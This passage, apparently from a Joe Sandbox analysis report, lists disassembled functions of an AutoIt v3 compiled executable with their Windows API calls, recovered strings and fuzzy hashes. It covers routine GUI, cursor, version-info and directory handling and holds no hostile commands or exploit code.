                                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                        • String ID: ($0$tooltips_class32
                                                        • API String ID: 698492251-4156429822
                                                        • Opcode ID: f22482149e54a48a95631297a99043c51ed79d08b10f619d7f1a69575e8484ef
                                                        • Instruction ID: 214e1d7a9895d21b1b6cdff663496011d597aa3616a26496990f1577c94ac8bf
                                                        • Opcode Fuzzy Hash: f22482149e54a48a95631297a99043c51ed79d08b10f619d7f1a69575e8484ef
                                                        • Instruction Fuzzy Hash: 44B17A71604340AFDB04DF64C889B6ABBE4FF89714F00891CF99A9B2A1DB71EC45CB95
                                                        Function 0012449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileVersionInfoSizeW.VERSION(?,?), ref: 001244AC
                                                        • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 001244D2
                                                        • _wcscpy.LIBCMT ref: 00124500
                                                        • _wcscmp.LIBCMT ref: 0012450B
                                                        • _wcscat.LIBCMT ref: 00124521
                                                        • _wcsstr.LIBCMT ref: 0012452C
                                                        • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00124548
                                                        • _wcscat.LIBCMT ref: 00124591
                                                        • _wcscat.LIBCMT ref: 00124598
                                                        • _wcsncpy.LIBCMT ref: 001245C3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                        • API String ID: 699586101-1459072770
                                                        • Opcode ID: 47106ea3ba6ba474ea4f3eb3a039f84285a38cc69f40bce7a76693718e57e70c
                                                        • Instruction ID: 944cab6d9031996f1ed96edb504b98b0dce5a649d72d69f76f9b909258aebe00
                                                        • Opcode Fuzzy Hash: 47106ea3ba6ba474ea4f3eb3a039f84285a38cc69f40bce7a76693718e57e70c
                                                        • Instruction Fuzzy Hash: BA41E132A402517FEB14AB759C07FFF77ACDF42710F10406AF905B6293EB74AA1186A5
                                                        Function 000C27D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 000C28BC
                                                        • GetSystemMetrics.USER32(00000007), ref: 000C28C4
                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 000C28EF
                                                        • GetSystemMetrics.USER32(00000008), ref: 000C28F7
                                                        • GetSystemMetrics.USER32(00000004), ref: 000C291C
                                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 000C2939
                                                        • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 000C2949
                                                        • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 000C297C
                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 000C2990
                                                        • GetClientRect.USER32(00000000,000000FF), ref: 000C29AE
                                                        • GetStockObject.GDI32(00000011), ref: 000C29CA
                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 000C29D5
                                                          • Part of subcall function 000C2344: GetCursorPos.USER32(?), ref: 000C2357
                                                          • Part of subcall function 000C2344: ScreenToClient.USER32(001857B0,?), ref: 000C2374
                                                          • Part of subcall function 000C2344: GetAsyncKeyState.USER32(00000001), ref: 000C2399
                                                          • Part of subcall function 000C2344: GetAsyncKeyState.USER32(00000002), ref: 000C23A7
                                                        • SetTimer.USER32(00000000,00000000,00000028,000C1256), ref: 000C29FC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                        • String ID: AutoIt v3 GUI
                                                        • API String ID: 1458621304-248962490
                                                        • Opcode ID: 76a54c79423480633162cb9239de531aa46fd9cd41d49b89e2057e413df92270
                                                        • Instruction ID: ba84358f77ca6b5b70c8bc4510f689d07c57a0e5e32b76d59a9441ae749a9e05
                                                        • Opcode Fuzzy Hash: 76a54c79423480633162cb9239de531aa46fd9cd41d49b89e2057e413df92270
                                                        • Instruction Fuzzy Hash: CEB19E75A0020AEFDB14DFA8CD45FAE7BB5FB09310F104229FA15E76A0DB74A991CB50
                                                        Function 0011A439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetClassNameW.USER32(?,?,00000100), ref: 0011A47A
                                                        • __swprintf.LIBCMT ref: 0011A51B
                                                        • _wcscmp.LIBCMT ref: 0011A52E
                                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0011A583
                                                        • _wcscmp.LIBCMT ref: 0011A5BF
                                                        • GetClassNameW.USER32(?,?,00000400), ref: 0011A5F6
                                                        • GetDlgCtrlID.USER32(?), ref: 0011A648
                                                        • GetWindowRect.USER32(?,?), ref: 0011A67E
                                                        • GetParent.USER32(?), ref: 0011A69C
                                                        • ScreenToClient.USER32(00000000), ref: 0011A6A3
                                                        • GetClassNameW.USER32(?,?,00000100), ref: 0011A71D
                                                        • _wcscmp.LIBCMT ref: 0011A731
                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 0011A757
                                                        • _wcscmp.LIBCMT ref: 0011A76B
                                                          • Part of subcall function 000E362C: _iswctype.LIBCMT ref: 000E3634
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                        • String ID: %s%u
                                                        • API String ID: 3744389584-679674701
                                                        • Opcode ID: a851837a1af2b284f6ac8c5ba2f4cd7be9e40e601efe0f426bc8cf276b3d2e51
                                                        • Instruction ID: b45c131485a8abd15bada1ed777c169e40795ffc1c873d6cdb0e49943894a247
                                                        • Opcode Fuzzy Hash: a851837a1af2b284f6ac8c5ba2f4cd7be9e40e601efe0f426bc8cf276b3d2e51
                                                        • Instruction Fuzzy Hash: 24A1D171205606AFD719DF60C884FEABBE8FF44310F448539F999D2191DB30EA96CB92
                                                        Function 0011AED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetClassNameW.USER32(00000008,?,00000400), ref: 0011AF18
                                                        • _wcscmp.LIBCMT ref: 0011AF29
                                                        • GetWindowTextW.USER32(00000001,?,00000400), ref: 0011AF51
                                                        • CharUpperBuffW.USER32(?,00000000), ref: 0011AF6E
                                                        • _wcscmp.LIBCMT ref: 0011AF8C
                                                        • _wcsstr.LIBCMT ref: 0011AF9D
                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 0011AFD5
                                                        • _wcscmp.LIBCMT ref: 0011AFE5
                                                        • GetWindowTextW.USER32(00000002,?,00000400), ref: 0011B00C
                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 0011B055
                                                        • _wcscmp.LIBCMT ref: 0011B065
                                                        • GetClassNameW.USER32(00000010,?,00000400), ref: 0011B08D
                                                        • GetWindowRect.USER32(00000004,?), ref: 0011B0F6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                        • String ID: @$ThumbnailClass
                                                        • API String ID: 1788623398-1539354611
                                                        • Opcode ID: 2417b88634491945b7e00249f18d00a990b12a68c4df6805cf8d86c893a46617
                                                        • Instruction ID: 3c3f2adfe535d30d1f4d302424da2f06f428afabc71c32813b915c76f3cc41b6
                                                        • Opcode Fuzzy Hash: 2417b88634491945b7e00249f18d00a990b12a68c4df6805cf8d86c893a46617
                                                        • Instruction Fuzzy Hash: DD818071108206AFDB09DF11D885FEA7BE8EF44314F04847AFD899A1A6DB34DD86CB61
                                                        Function 0011ABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: __wcsnicmp
                                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                        • API String ID: 1038674560-1810252412
                                                        • Opcode ID: 1c7beec78097e7fe1c851af3d88c6d594d221e992eb7fb5763c2dfbaac3815f0
                                                        • Instruction ID: 5a9c164f4ecfe4645951d5523d82eec3cb971648ff467164cbdb5dcea4b29b26
                                                        • Opcode Fuzzy Hash: 1c7beec78097e7fe1c851af3d88c6d594d221e992eb7fb5763c2dfbaac3815f0
                                                        • Instruction Fuzzy Hash: 9E31A431A48209ABEA18FB64DE03FEEBB749F10711F644439F449720D2EF616F448A92
                                                        Function 00134FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 00135013
                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 0013501E
                                                        • LoadCursorW.USER32(00000000,00007F03), ref: 00135029
                                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 00135034
                                                        • LoadCursorW.USER32(00000000,00007F01), ref: 0013503F
                                                        • LoadCursorW.USER32(00000000,00007F81), ref: 0013504A
                                                        • LoadCursorW.USER32(00000000,00007F88), ref: 00135055
                                                        • LoadCursorW.USER32(00000000,00007F80), ref: 00135060
                                                        • LoadCursorW.USER32(00000000,00007F86), ref: 0013506B
                                                        • LoadCursorW.USER32(00000000,00007F83), ref: 00135076
                                                        • LoadCursorW.USER32(00000000,00007F85), ref: 00135081
                                                        • LoadCursorW.USER32(00000000,00007F82), ref: 0013508C
                                                        • LoadCursorW.USER32(00000000,00007F84), ref: 00135097
                                                        • LoadCursorW.USER32(00000000,00007F04), ref: 001350A2
                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 001350AD
                                                        • LoadCursorW.USER32(00000000,00007F89), ref: 001350B8
                                                        • GetCursorInfo.USER32(?), ref: 001350C8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Cursor$Load$Info
                                                        • String ID:
                                                        • API String ID: 2577412497-0
                                                        • Opcode ID: 37c8ec942ee752d2bbc5379f22b60f16e5dd912ae3136ae91b0fc8a79d528ce0
                                                        • Instruction ID: ca5a7376f6e47e9f359c9c7ca991668beb0adde33de6044128a0a75eddf301f1
                                                        • Opcode Fuzzy Hash: 37c8ec942ee752d2bbc5379f22b60f16e5dd912ae3136ae91b0fc8a79d528ce0
                                                        • Instruction Fuzzy Hash: E53115B1D083196ADF109FB68C8999FBFE9FF04750F50452AE50CE7280DB7965048FA1
                                                        Function 0014A1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 0014A259
                                                        • DestroyWindow.USER32(?,?), ref: 0014A2D3
                                                          • Part of subcall function 000C7BCC: _memmove.LIBCMT ref: 000C7C06
                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0014A34D
                                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0014A36F
                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0014A382
                                                        • DestroyWindow.USER32(00000000), ref: 0014A3A4
                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,000C0000,00000000), ref: 0014A3DB
                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0014A3F4
                                                        • GetDesktopWindow.USER32 ref: 0014A40D
                                                        • GetWindowRect.USER32(00000000), ref: 0014A414
                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0014A42C
                                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0014A444
                                                          • Part of subcall function 000C25DB: GetWindowLongW.USER32(?,000000EB), ref: 000C25EC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                        • String ID: 0$tooltips_class32
                                                        • API String ID: 1297703922-3619404913
                                                        • Opcode ID: 7101fd946f845534e450ac00670f5b7b98be699e3a4228981cd4c591bc2e7c4c
                                                        • Instruction ID: 3802c9ab8c0e48b9561cad7d20aabb6f14fcf224cb18d73a9a69e2ef59f13b8c
                                                        • Opcode Fuzzy Hash: 7101fd946f845534e450ac00670f5b7b98be699e3a4228981cd4c591bc2e7c4c
                                                        • Instruction Fuzzy Hash: 92718C74180205AFD725CF28CC49FAA7BEAFB89304F49452DF985972B1D770E942CB52
                                                        Function 0014C5FE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 000C2612: GetWindowLongW.USER32(?,000000EB), ref: 000C2623
                                                        • DragQueryPoint.SHELL32(?,?), ref: 0014C627
                                                          • Part of subcall function 0014AB37: ClientToScreen.USER32(?,?), ref: 0014AB60
                                                          • Part of subcall function 0014AB37: GetWindowRect.USER32(?,?), ref: 0014ABD6
                                                          • Part of subcall function 0014AB37: PtInRect.USER32(?,?,0014C014), ref: 0014ABE6
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0014C690
                                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0014C69B
                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0014C6BE
                                                        • _wcscat.LIBCMT ref: 0014C6EE
                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0014C705
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0014C71E
                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0014C735
                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0014C757
                                                        • DragFinish.SHELL32(?), ref: 0014C75E
                                                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0014C851
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                        • API String ID: 169749273-3440237614
                                                        • Opcode ID: 0f1f9b547477cd1804f844f66896287a5fc3a732c4ac04b5099e9d02f09a02e0
                                                        • Instruction ID: 1ba16af9dc943d4d2390f3563f4714fc5cc6e82dabb6cf920e6cad8a004ea915
                                                        • Opcode Fuzzy Hash: 0f1f9b547477cd1804f844f66896287a5fc3a732c4ac04b5099e9d02f09a02e0
                                                        • Instruction Fuzzy Hash: 3A613871108301AFC701EF64DC85EAFBBE9EF89750F00492EF595962B1DB709A49CB92
                                                        Function 00144392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?), ref: 00144424
                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0014446F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: BuffCharMessageSendUpper
                                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                        • API String ID: 3974292440-4258414348
                                                        • Opcode ID: 4855f1a8fe0e5d8a74af56c99834d71481f2ed4bf46d9c518c472f6b5d8aff4c
                                                        • Instruction ID: 0f9496ed90d10757782cc5b977ef8f1857c35cd4193fd33d004ab79df5d21173
                                                        • Opcode Fuzzy Hash: 4855f1a8fe0e5d8a74af56c99834d71481f2ed4bf46d9c518c472f6b5d8aff4c
                                                        • Instruction Fuzzy Hash: 2C916D752047019FCB08EF10C455BAEB7A1AF95754F05886CF8966B3A3CB31ED8ACB91
                                                        Function 0014B7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0014B8B4
                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,001491C2), ref: 0014B910
                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0014B949
                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0014B98C
                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0014B9C3
                                                        • FreeLibrary.KERNEL32(?), ref: 0014B9CF
                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0014B9DF
                                                        • DestroyIcon.USER32(?,?,?,?,?,001491C2), ref: 0014B9EE
                                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0014BA0B
                                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0014BA17
                                                          • Part of subcall function 000E2EFD: __wcsicmp_l.LIBCMT ref: 000E2F86
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                        • String ID: .dll$.exe$.icl
                                                        • API String ID: 1212759294-1154884017
                                                        • Opcode ID: 4b93c9249d439afedab4fbe8bcdaff249188fad39d4463768388cf3c1eecbef0
                                                        • Instruction ID: c559f224238c60fc87ce66de3def53e745f77e44583b28ad6326485baabb901b
                                                        • Opcode Fuzzy Hash: 4b93c9249d439afedab4fbe8bcdaff249188fad39d4463768388cf3c1eecbef0
                                                        • Instruction Fuzzy Hash: B361EDB1A04219BAEB14DF64CC81FBE7BACEB08724F104119FA15D61E1DB74D981DBA0
                                                        Function 0012DC1A Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLocalTime.KERNEL32(?), ref: 0012DCDC
                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 0012DCEC
                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0012DCF8
                                                        • __wsplitpath.LIBCMT ref: 0012DD56
                                                        • _wcscat.LIBCMT ref: 0012DD6E
                                                        • _wcscat.LIBCMT ref: 0012DD80
                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0012DD95
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0012DDA9
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0012DDDB
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0012DDFC
                                                        • _wcscpy.LIBCMT ref: 0012DE08
                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0012DE47
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                        • String ID: *.*
                                                        • API String ID: 3566783562-438819550
                                                        • Opcode ID: d542ddbbd8f372548a743fecb7db8b8e462a7bd0ef7c68db04b2b4e1c3a21752
                                                        • Instruction ID: 6ebeac9aa81a2a9535365fa2ae4653b5e71f6e72fbfba4b204bb0b52544f3802
                                                        • Opcode Fuzzy Hash: d542ddbbd8f372548a743fecb7db8b8e462a7bd0ef7c68db04b2b4e1c3a21752
                                                        • Instruction Fuzzy Hash: 69617A765042559FCB10EF60E844EAEB3E8FF89310F04892DF989D7262DB31E955CB92
                                                        Function 00129C38 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00129C7F
                                                          • Part of subcall function 000C7DE1: _memmove.LIBCMT ref: 000C7E22
                                                        • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00129CA0
                                                        • __swprintf.LIBCMT ref: 00129CF9
                                                        • __swprintf.LIBCMT ref: 00129D12
                                                        • _wprintf.LIBCMT ref: 00129DB9
                                                        • _wprintf.LIBCMT ref: 00129DD7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
